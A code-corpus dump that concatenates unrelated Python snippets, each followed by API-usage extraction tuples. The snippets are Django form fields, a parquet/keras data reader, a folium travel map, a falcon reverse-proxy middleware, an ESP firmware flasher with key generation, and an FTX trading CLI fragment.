name = self.field_map[name]
col = column_dict[name]
if not col.sortable:
return queryset
attr = col.attr or name
if col.reverse:
reverse = not reverse
if reverse:
attr = "-%s" % attr
return queryset.order_by(attr)
def handle_dataset(self, dataset, value, bound_field):
text_value = force_text(value) if value is not None else None
if not text_value:
return
reverse = text_value.startswith("-")
value = text_value[1:] if reverse else text_value
name = self.field_map[value]
column = dataset.columns[name]
if column.reverse:
reverse = not reverse
column.sort(reverse=reverse)
class SortField(GingerSortField):
def __init__(self, *args, **kwargs):
super(SortField, self).__init__(*args, **kwargs)
warnings.warn("Please use GingerSortField instead of SortField", DeprecationWarning)
class GingerPageField(forms.IntegerField):
widget = EmptyWidget
html_name = None
def __init__(self, per_page=20, page_limit=10, **kwargs):
kwargs.setdefault('required', False)
self.per_page = per_page
self.page_limit = page_limit
super(GingerPageField, self).__init__(**kwargs)
def bind_form(self, name, form):
self.html_name = form[name].html_name
def clean(self, value):
try:
value = super(GingerPageField, self).clean(value)
except forms.ValidationError:
return 1
return value
def handle_queryset(self, queryset, value, data):
return paginator.paginate(queryset, value,
per_page=self.per_page,
parameter_name=self.html_name
)
def build_links(self, request, bound_field):
value = bound_field.value()
field_name = bound_field.name
text_value = force_text(value) if value is not None else None
for k, v in self.choices:
content = force_text(v)
key = force_text(k)
is_active = text_value and text_value == key
if is_active and self.toggle:
next_value = key if text_value.startswith("-") else "-%s" % key
else:
next_value = key
url = utils.get_url_with_modified_params(request, {field_name: next_value})
yield ui.Link(url=url, content=content, is_active=is_active)
|
[
"django.forms.IntegerField",
"os.path.basename",
"ginger.utils.cm_to_feet_inches",
"ginger.paginator.paginate",
"django.core.validators.URLValidator",
"django.forms.TextInput",
"django.utils.six.iteritems",
"ginger.utils.feet_inches_to_cm",
"ginger.ui.Link",
"django.forms.HiddenInput",
"ginger.utils.get_url_with_modified_params",
"django.utils.six.moves.urllib.parse.urlparse",
"warnings.warn",
"django.utils.encoding.force_text",
"mimetypes.guess_type"
] |
[((1069, 1083), 'django.core.validators.URLValidator', 'URLValidator', ([], {}), '()\n', (1081, 1083), False, 'from django.core.validators import URLValidator\n'), ((1238, 1251), 'django.utils.six.moves.urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (1246, 1251), False, 'from django.utils.six.moves.urllib.parse import urlparse\n'), ((1307, 1329), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1323, 1329), False, 'import os\n'), ((4261, 4278), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (4271, 4278), False, 'from django.utils.encoding import force_text\n'), ((5653, 5682), 'django.utils.six.iteritems', 'six.iteritems', (['self.field_map'], {}), '(self.field_map)\n', (5666, 5682), False, 'from django.utils import six\n'), ((7488, 7576), 'warnings.warn', 'warnings.warn', (['"""Please use GingerSortField instead of SortField"""', 'DeprecationWarning'], {}), "('Please use GingerSortField instead of SortField',\n DeprecationWarning)\n", (7501, 7576), False, 'import warnings\n'), ((8236, 8331), 'ginger.paginator.paginate', 'paginator.paginate', (['queryset', 'value'], {'per_page': 'self.per_page', 'parameter_name': 'self.html_name'}), '(queryset, value, per_page=self.per_page, parameter_name=\n self.html_name)\n', (8254, 8331), False, 'from ginger import ui, utils, paginator\n'), ((2181, 2237), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'placeholder': '5', 'size': '3'}"}), "(attrs={'placeholder': '5', 'size': '3'})\n", (2196, 2237), False, 'from django import forms\n'), ((2239, 2295), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'placeholder': '6', 'size': '3'}"}), "(attrs={'placeholder': '6', 'size': '3'})\n", (2254, 2295), False, 'from django import forms\n'), ((2538, 2562), 'ginger.utils.cm_to_feet_inches', 'cm_to_feet_inches', (['value'], {}), '(value)\n', (2555, 2562), False, 'from ginger.utils import feet_inches_to_cm, cm_to_feet_inches\n'), ((3118, 3164), 'django.forms.IntegerField', 'forms.IntegerField', ([], {'min_value': '(0)', 'required': 'reqd'}), '(min_value=0, required=reqd)\n', (3136, 3164), False, 'from django import forms\n'), ((3177, 3223), 'django.forms.IntegerField', 'forms.IntegerField', ([], {'min_value': '(0)', 'required': 'reqd'}), '(min_value=0, required=reqd)\n', (3195, 3223), False, 'from django import forms\n'), ((3457, 3488), 'ginger.utils.feet_inches_to_cm', 'feet_inches_to_cm', (['feet', 'inches'], {}), '(feet, inches)\n', (3474, 3488), False, 'from ginger.utils import feet_inches_to_cm, cm_to_feet_inches\n'), ((4603, 4620), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (4613, 4620), False, 'from django.utils.encoding import force_text\n'), ((4708, 4721), 'django.utils.encoding.force_text', 'force_text', (['v'], {}), '(v)\n', (4718, 4721), False, 'from django.utils.encoding import force_text\n'), ((4740, 4753), 'django.utils.encoding.force_text', 'force_text', (['k'], {}), '(k)\n', (4750, 4753), False, 'from django.utils.encoding import force_text\n'), ((5002, 5071), 'ginger.utils.get_url_with_modified_params', 'utils.get_url_with_modified_params', (['request', '{field_name: next_value}'], {}), '(request, {field_name: next_value})\n', (5036, 5071), False, 'from ginger import ui, utils, paginator\n'), ((6321, 6338), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (6331, 6338), False, 'from django.utils.encoding import force_text\n'), ((6973, 6990), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (6983, 6990), False, 'from django.utils.encoding import force_text\n'), ((8554, 8571), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (8564, 8571), False, 'from django.utils.encoding import force_text\n'), ((8659, 8672), 'django.utils.encoding.force_text', 'force_text', (['v'], {}), '(v)\n', (8669, 8672), False, 'from django.utils.encoding import force_text\n'), ((8691, 8704), 'django.utils.encoding.force_text', 'force_text', (['k'], {}), '(k)\n', (8701, 8704), False, 'from django.utils.encoding import force_text\n'), ((8953, 9022), 'ginger.utils.get_url_with_modified_params', 'utils.get_url_with_modified_params', (['request', '{field_name: next_value}'], {}), '(request, {field_name: next_value})\n', (8987, 9022), False, 'from ginger import ui, utils, paginator\n'), ((1551, 1577), 'mimetypes.guess_type', 'mimetypes.guess_type', (['name'], {}), '(name)\n', (1571, 1577), False, 'import mimetypes\n'), ((5090, 5144), 'ginger.ui.Link', 'ui.Link', ([], {'url': 'url', 'content': 'content', 'is_active': 'is_active'}), '(url=url, content=content, is_active=is_active)\n', (5097, 5144), False, 'from ginger import ui, utils, paginator\n'), ((6032, 6058), 'django.utils.six.iteritems', 'six.iteritems', (['column_dict'], {}), '(column_dict)\n', (6045, 6058), False, 'from django.utils import six\n'), ((9041, 9095), 'ginger.ui.Link', 'ui.Link', ([], {'url': 'url', 'content': 'content', 'is_active': 'is_active'}), '(url=url, content=content, is_active=is_active)\n', (9048, 9095), False, 'from ginger import ui, utils, paginator\n'), ((1750, 1769), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1767, 1769), False, 'from django import forms\n')]
|
from common import *
import itertools
from scipy.sparse import csr_matrix
def nested_to_sparse(df, num_columns, index=None):
if not (index is None): df = df.reindex(index)
assert len(df.columns) == 1
series = df[df.columns[0]]
N = num_columns
series.loc[series.isnull()] = series[series.isnull()].apply(lambda d: [])
idx_ptr = np.array([0] + list(series.apply(len).cumsum()))
idx = np.array(list(itertools.chain.from_iterable(series)))
data = np.ones(idx.shape)
return csr_matrix((data, idx, idx_ptr), shape=(len(df), N)).tocoo()
class PqReader(object):
def __init__(self, file, **kwargs):
self.file = file
self.__dict__.update(**kwargs)
def load(self):
self.data = pq.read_parquet(self.file)
self.data = self.process(self.data)
def process(self, data):
return data
def len_code(self):
return len(self.data.columns)
def as_matrix(self, index=None):
df = self.data
if not (index is None): df = df.reindex(index)
if isinstance(df, pd.Series): df = df.to_frame()
return df.as_matrix()
def keras_input(self, name):
import keras as K
return K.Input(self.data.shape, name=name)
class SparsePqReader(PqReader):
def load(self):
self.data = pq.read_parquet(self.file)
self.code = pq.read_parquet(self.file + ".code")
self.data, self.code = self.process(self.data, self.code)
def len_code(self):
return len(self.code)
def as_matrix(self, index=None):
N = self.len_code()
return nested_to_sparse(self.data, N, index)
def keras_input(self, name):
import keras as K
N = self.len_code()
return K.Input((N,), sparse=True, name=name )
def process(self, data, code):
return data, code
class PqCutoffReader(PqReader):
def __init__(self, file, cutoffs, **kwargs):
self.file = file
self.cutoffs = cutoffs
self.__dict__.update(**kwargs)
def process(self, data):
df = data
COLS = []
for name in df.columns:
for c in self.cutoffs:
S = ( df[name] > c ).astype(float)
S.loc[ df[name].isnull() ] = np.nan
S = S.rename( (name, c) )
COLS.append( S )
return pd.concat(COLS, axis=1).astype(float)
def _missing_to_indicator(series, replace_null=0.0, conditionally=True):
mask = series.isnull()
if conditionally and not mask.any():
return series.to_frame()
series = series.fillna(replace_null)
mask = mask.astype("float")
return pd.concat([series, mask], axis=1)
def _normalize(series):
m, s = series.mean(), series.std()
return (series - m) / s, m, s
def _window(series):
M, m = series.max(), series.min()
return ( series - m ) / (M - m), M, m
class ExprReader(PqReader):
expression = NotImplemented
def get_vars(self, data):
V = {}
for f in data.columns:
V[f] = data[f]
return V
def process(self,data):
OUT = eval(self.expression, self.get_vars(data),{})
OUT, self.max, self.min = _window(OUT)
return _missing_to_indicator(OUT, conditionally=True)
class AgeReader(PqReader):
def process(self, data):
Y = (data.ADMIT_DATE - data.MASKED_DOB).dt.days / 365.25
Y, self.max, self.min = _window(Y)
return _missing_to_indicator(Y, conditionally=True)
class FilterSparsePqReader(SparsePqReader):
def process(self, data, code):
filter = self.filter(data, code)
new_code = code.reindex( code.index[~filter] )
MAP = { i:n for n,i in enumerate(new_code.index) }
new_code = new_code.reset_index()
new_data = data.apply(self.remap, args=(MAP,))
return new_data, new_code
def filter(self, data, code): return []
def remap(self, seqs, map):
out = []
for seq in seqs:
if seq is np.nan:
out.append(seq)
continue
new_map = np.array([map[s] for s in seq if s in map])
if not len(new_map): new_map = np.nan
out.append(new_map)
return out
class MultiFilterSparsePqReader(SparsePqReader):
def process(self, data, code):
for name, filter, negate in self.filter(data, code):
if negate: filter = ~filter
new_code = code.reindex( code.index[filter] )
MAP = { i:n for n,i in enumerate(new_code.index) }
new_code = new_code.reset_index()
new_data = data.apply(self.remap, args=(MAP,))
self.add(name, new_data, new_code)
return None, code
def add(self, name, data, code):
if hasattr(type(self), name):
raise RuntimeError("Filter name '%s' clobbers attribute of class '%s'" % (name, str(type(self))))
R = SparsePqReader(self, data = data, code = code, name = name)
self.__dict__[name] = R
def filter(self, data, code): yield []
def remap(self, seqs, map):
out = []
for seq in seqs:
if seq is np.nan:
out.append(seq)
continue
new_map = np.array([map[s] for s in seq if s in map])
if not len(new_map): new_map = np.nan
out.append(new_map)
return out
|
[
"keras.Input",
"itertools.chain.from_iterable"
] |
[((1206, 1241), 'keras.Input', 'K.Input', (['self.data.shape'], {'name': 'name'}), '(self.data.shape, name=name)\n', (1213, 1241), True, 'import keras as K\n'), ((1744, 1781), 'keras.Input', 'K.Input', (['(N,)'], {'sparse': '(True)', 'name': 'name'}), '((N,), sparse=True, name=name)\n', (1751, 1781), True, 'import keras as K\n'), ((431, 468), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['series'], {}), '(series)\n', (460, 468), False, 'import itertools\n')]
|
import folium
map = folium.Map(location = [40.7864, 17.2409], zoom_start=6, tiles = "OpenStreetMap")
fgv = folium.FeatureGroup(name="To Visit")
fgv.add_child(folium.Marker(location = [40.7864, 17.2409], popup = "Arbelobello,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [43.7696, 11.2558], popup = "Florence,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [43.8429, 10.5027], popup = "Lucca,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [40.3980, 17.6377], popup = "Manduria,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [40.3515, 18.1750], popup = "Lecce,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [44.1116, 9.7339], popup = "Manarola,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [42.6826, 11.7142], popup = "Sorano,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-20.2067, 57.5522], popup = "Mauritius", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [50.0647, 19.9450], popup = "Krakow, Poland", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [44.4056, 8.9463], popup = "Genoa,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.9794, 2.8214], popup = "Girona,Spain", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.3851, 2.1734], popup = "Barcelona,Spain", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-2.3326, 34.6857], popup = "Serengeti,Tanzania", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [52.3667, 4.8945], popup = "Amsterdam,Netherlands", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [57.4737, -4.0918], popup = "Culloden,Scotland", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [42.6507, 18.0944], popup = "Dubrovnik,Crotaia", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [48.8566, 2.3522], popup = "Paris,France", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [28.6050, -80.6026], popup = "Kennedy Space Center,USA", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-38.2619, 175.0986], popup = "Waitomo,New Zealand", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.9047, 12.4547], popup = "Vatican City,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgp = folium.FeatureGroup(name="Population")
fgp.add_child(folium.GeoJson(data=open('world.json', 'r', encoding='utf-8-sig').read(),
style_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000
else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))
map.add_child(fgv)
map.add_child(fgp)
map.add_child(folium.LayerControl())
map.save("map.html")
|
[
"folium.FeatureGroup",
"folium.LayerControl",
"folium.Map",
"folium.Icon"
] |
[((27, 103), 'folium.Map', 'folium.Map', ([], {'location': '[40.7864, 17.2409]', 'zoom_start': '(6)', 'tiles': '"""OpenStreetMap"""'}), "(location=[40.7864, 17.2409], zoom_start=6, tiles='OpenStreetMap')\n", (37, 103), False, 'import folium\n'), ((117, 153), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': '"""To Visit"""'}), "(name='To Visit')\n", (136, 153), False, 'import folium\n'), ((3063, 3101), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': '"""Population"""'}), "(name='Population')\n", (3082, 3101), False, 'import folium\n'), ((3422, 3443), 'folium.LayerControl', 'folium.LayerControl', ([], {}), '()\n', (3441, 3443), False, 'import folium\n'), ((252, 300), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (263, 300), False, 'import folium\n'), ((396, 444), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (407, 444), False, 'import folium\n'), ((537, 585), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (548, 585), False, 'import folium\n'), ((681, 729), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (692, 729), False, 'import folium\n'), ((822, 870), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (833, 870), False, 'import folium\n'), ((965, 1013), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (976, 1013), False, 'import folium\n'), ((1107, 1155), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1118, 1155), False, 'import folium\n'), ((1247, 1295), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1258, 1295), False, 'import folium\n'), ((1391, 1439), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1402, 1439), False, 'import folium\n'), ((1531, 1579), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1542, 1579), False, 'import folium\n'), ((1672, 1720), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1683, 1720), False, 'import folium\n'), ((1816, 1864), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1827, 1864), False, 'import folium\n'), ((1964, 2012), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1975, 2012), False, 'import folium\n'), ((2114, 2162), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2125, 2162), False, 'import folium\n'), ((2261, 2309), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2272, 2309), False, 'import folium\n'), ((2408, 2456), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2419, 2456), False, 'import folium\n'), ((2549, 2597), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2560, 2597), False, 'import folium\n'), ((2704, 2752), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2715, 2752), False, 'import folium\n'), ((2855, 2903), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2866, 2903), False, 'import folium\n'), ((3003, 3051), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (3014, 3051), False, 'import folium\n')]
|
import psutil, os
p = psutil.Process(os.getpid())
for dll in p.memory_maps():
print(dll.path)
|
[
"os.getpid"
] |
[((38, 49), 'os.getpid', 'os.getpid', ([], {}), '()\n', (47, 49), False, 'import psutil, os\n')]
|
from django.contrib import admin
from .models import MyModel
@admin.register(MyModel)
class MyModelAdmin(admin.ModelAdmin):
list_display = ["id", "image"]
|
[
"django.contrib.admin.register"
] |
[((65, 88), 'django.contrib.admin.register', 'admin.register', (['MyModel'], {}), '(MyModel)\n', (79, 88), False, 'from django.contrib import admin\n')]
|
# -*- coding: utf-8 -*-
import traceback
from urllib.parse import urlparse
import falcon
import fire
import requests
import waitress
from transformer import Transformer
class Proxy:
"""
A falcon middleware acting as a proxy server
"""
def __init__(self, target):
"""
:param target: target domain to serve
Also configures a Transformer instance that will be used to transform
the html response of the target domain
"""
self.target_domain = target.split('/')[-1] # remove possible 'http://'
self.transformer = Transformer(target_domain=self.target_domain)
def process_request(self, req, resp):
"""
Middleware defining the proxy logic itself
:param req: initial http request
:param resp: http response that the middleware is acting on
:return: None
"""
try:
# redirects request to the target domain
request_source = urlparse(req.url).netloc
url = req.url.replace(request_source, self.target_domain)
_ = requests.get(url)
_.raise_for_status()
page = _.text
resp.body = self.transformer.transform(page, request_source)
except Exception as e:
resp.status = falcon.HTTP_500
error_info = { # object to render in case of exception
'exc': e,
'exc_info': traceback.format_exc(),
'url': req.url,
'target': self.target_domain
}
resp.body = """
<h3>Exception: {exc} </h4>
<hr /> {exc_info} <hr />
<h4>URL: {url} </h4>
<h4>Target: {target} </h4>""".format(**error_info)
def process_response(self, req, resp, resource, req_succeeded):
"""
Sets appropriate Content-Type
Prevents server from responding 404, does nothing if resp code is 500
"""
resp.set_header('Content-Type', 'text/html;charset=UTF-8')
if resp.status == falcon.HTTP_NOT_FOUND:
resp.status = falcon.HTTP_200
def main(host='localhost', port=8080, target='http://habrahabr.ru'):
api = falcon.API(middleware=[Proxy(target), ])
print('Target domain: {}'.format(target))
waitress.serve(api, host=host, port=port)
if __name__ == '__main__':
fire.Fire(main) # Fire wrapper adds CLI behaviour
|
[
"transformer.Transformer",
"fire.Fire",
"waitress.serve",
"traceback.format_exc",
"requests.get",
"urllib.parse.urlparse"
] |
[((2306, 2347), 'waitress.serve', 'waitress.serve', (['api'], {'host': 'host', 'port': 'port'}), '(api, host=host, port=port)\n', (2320, 2347), False, 'import waitress\n'), ((2381, 2396), 'fire.Fire', 'fire.Fire', (['main'], {}), '(main)\n', (2390, 2396), False, 'import fire\n'), ((588, 633), 'transformer.Transformer', 'Transformer', ([], {'target_domain': 'self.target_domain'}), '(target_domain=self.target_domain)\n', (599, 633), False, 'from transformer import Transformer\n'), ((1090, 1107), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (1102, 1107), False, 'import requests\n'), ((979, 996), 'urllib.parse.urlparse', 'urlparse', (['req.url'], {}), '(req.url)\n', (987, 996), False, 'from urllib.parse import urlparse\n'), ((1435, 1457), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1455, 1457), False, 'import traceback\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import shutil
import tempfile
import nacl.signing
import os
import sys
import yaml
import logging.config
from config.logging import LOGGING_CONFIG
logging.config.dictConfig(LOGGING_CONFIG)
logger = logging.getLogger("utils")
def write_array(arr: list) -> str:
buff = ""
i = 0
while i < 32:
buff += arr[i]
if i != 31:
buff += ", "
i += 1
if i % 8 == 0:
buff += "\n "
return buff
def generate_keys() -> tuple:
signing_key = nacl.signing.SigningKey.generate()
signing_array = [int(x) for x in bytes(signing_key)]
signing_letters = ["0x{0:02X}".format(x) for x in signing_array]
verify_key = signing_key.verify_key
verify_array = [int(x) for x in bytes(verify_key)]
verify_letters = ["0x{0:02X}".format(x) for x in verify_array]
return signing_letters, verify_letters
def main() -> None:
parser = argparse.ArgumentParser(description="Prepare and flush ESP firmware")
parser.add_argument(
"-s",
metavar="source",
type=str,
default=".",
help="firmware folder (default to current dir)",
)
parser.add_argument(
"-c",
metavar="config",
type=str,
default="config.yaml",
help="Path to configuration file",
)
parser.add_argument(
"-p", "--port", metavar="port", type=str, help="Port the board is connected to"
)
args = parser.parse_args()
if args.port:
port = args.port
else:
if sys.platform.startswith("win32"):
port = "COM1"
else:
port = "/dev/ttyUSB0"
logger.debug(f"Port is {port}")
with open(args.c) as f:
settings = yaml.load(f.read(), Loader=yaml.FullLoader)
ino = os.path.abspath(args.s)
source_file = os.listdir(os.path.join(ino, "src"))[0]
with open(os.path.join(ino, "src", source_file), "r") as f:
firmware = f.read()
for k, v in settings.items():
firmware = firmware.replace(k, str(v))
tempenv = tempfile.TemporaryDirectory()
logger.debug(f"Temporal directory is created: {tempenv}")
os.chdir(tempenv.name)
os.mkdir("src")
with open(os.path.join("src", source_file), "w") as f:
f.write(firmware)
logger.debug(firmware)
logger.debug("File {} is written".format(os.path.join("src", source_file)))
os.mkdir("include")
sk, vk = generate_keys()
with open(os.path.join("include", "secrets.h"), "w") as f:
f.write("uint8_t signing_key[32] = {\n ")
f.write(write_array(sk))
f.write(f"}};\n\nuint8_t verifying_key[32] = {{\n ")
f.write(write_array(vk))
f.write("};")
shutil.copyfile(os.path.join(ino, "platformio.ini"), "platformio.ini")
os.environ["PLATFORMIO_UPLOAD_PORT"] = port
if sys.platform.startswith("win32"):
os.system("python -m platformio run")
os.system("python -m platformio run -t upload")
else:
os.system("python3 -m platformio run")
os.system("python3 -m platformio run -t upload")
os.chdir(ino)
if __name__ == "__main__":
main()
|
[
"os.mkdir",
"os.path.abspath",
"sys.platform.startswith",
"tempfile.TemporaryDirectory",
"argparse.ArgumentParser",
"os.system",
"os.path.join",
"os.chdir"
] |
[((971, 1040), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Prepare and flush ESP firmware"""'}), "(description='Prepare and flush ESP firmware')\n", (994, 1040), False, 'import argparse\n'), ((1835, 1858), 'os.path.abspath', 'os.path.abspath', (['args.s'], {}), '(args.s)\n', (1850, 1858), False, 'import os\n'), ((2106, 2135), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (2133, 2135), False, 'import tempfile\n'), ((2203, 2225), 'os.chdir', 'os.chdir', (['tempenv.name'], {}), '(tempenv.name)\n', (2211, 2225), False, 'import os\n'), ((2230, 2245), 'os.mkdir', 'os.mkdir', (['"""src"""'], {}), "('src')\n", (2238, 2245), False, 'import os\n'), ((2451, 2470), 'os.mkdir', 'os.mkdir', (['"""include"""'], {}), "('include')\n", (2459, 2470), False, 'import os\n'), ((2897, 2929), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win32"""'], {}), "('win32')\n", (2920, 2929), False, 'import sys\n'), ((3152, 3165), 'os.chdir', 'os.chdir', (['ino'], {}), '(ino)\n', (3160, 3165), False, 'import os\n'), ((1587, 1619), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win32"""'], {}), "('win32')\n", (1610, 1619), False, 'import sys\n'), ((2786, 2821), 'os.path.join', 'os.path.join', (['ino', '"""platformio.ini"""'], {}), "(ino, 'platformio.ini')\n", (2798, 2821), False, 'import os\n'), ((2939, 2976), 'os.system', 'os.system', (['"""python -m platformio run"""'], {}), "('python -m platformio run')\n", (2948, 2976), False, 'import os\n'), ((2985, 3032), 'os.system', 'os.system', (['"""python -m platformio run -t upload"""'], {}), "('python -m platformio run -t upload')\n", (2994, 3032), False, 'import os\n'), ((3051, 3089), 'os.system', 'os.system', (['"""python3 -m platformio run"""'], {}), "('python3 -m platformio run')\n", (3060, 3089), False, 'import os\n'), ((3098, 3146), 'os.system', 'os.system', (['"""python3 -m platformio run -t upload"""'], {}), "('python3 -m platformio run -t upload')\n", (3107, 3146), False, 'import os\n'), ((1888, 1912), 'os.path.join', 'os.path.join', (['ino', '"""src"""'], {}), "(ino, 'src')\n", (1900, 1912), False, 'import os\n'), ((1931, 1968), 'os.path.join', 'os.path.join', (['ino', '"""src"""', 'source_file'], {}), "(ino, 'src', source_file)\n", (1943, 1968), False, 'import os\n'), ((2260, 2292), 'os.path.join', 'os.path.join', (['"""src"""', 'source_file'], {}), "('src', source_file)\n", (2272, 2292), False, 'import os\n'), ((2515, 2551), 'os.path.join', 'os.path.join', (['"""include"""', '"""secrets.h"""'], {}), "('include', 'secrets.h')\n", (2527, 2551), False, 'import os\n'), ((2411, 2443), 'os.path.join', 'os.path.join', (['"""src"""', 'source_file'], {}), "('src', source_file)\n", (2423, 2443), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
* Pizza delivery prompt example
* run example by writing `python example/pizza.py` in your console
"""
from __future__ import print_function, unicode_literals
import regex
from pprint import pprint
from PyInquirer import style_from_dict, Token, prompt
from PyInquirer import Validator, ValidationError, print_json
from examples import custom_style_3, custom_style_2, custom_style_1
import yaml
from ftx.ftx_operations import FTXMasterAccount, Position, Order
from tabulate import tabulate
from babel.numbers import format_currency
# Initialise Variables
global master
master: FTXMasterAccount
class objdict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
def __setattr__(self, name, value):
self[name] = value
def __delattr__(self, name):
if name in self:
del self[name]
else:
raise AttributeError("No such attribute: " + name)
def print_formatting():
print(" ")
print(" ")
print("===========================================================================================================")
def print_title(word):
length = len(word)
topline = ''
line = ''
for x in range(length):
line = line + '_'
topline = topline + '-'
print(" ")
print(topline)
print(word)
print(topline)
print(" ")
def validate(document):
ok = regex.match(
'^([01]{1})?[-.\s]?\(?(\d{3})\)?[-.\s]?(\d{3})[-.\s]?(\d{4})\s?((?:#|ext\.?\s?|x\.?\s?){1}(?:\d+)?)?$',
document.text)
if not ok:
raise ValidationError(
message='Please enter a valid phone number',
cursor_position=len(document.text)) # Move cursor to end
def validate_percent(document):
try:
int(document)
ok = False
if (int(document) and (int(document) > 0) and (int(document) < 101)):
ok = True
if not ok:
raise ValidationError(
message='Please enter a valid number between 1 and 100.',
cursor_position=len(document.text)) # Move cursor to end
except ValueError:
raise ValidationError(
message='Please enter a number between 1 and 100',
cursor_position=len(document.text)) # Move cursor to end
class NumberValidator(Validator):
def validate(self, document):
try:
int(document.text)
except ValueError:
raise ValidationError(
message='Please enter a number',
cursor_position=len(document.text)) # Move cursor to end
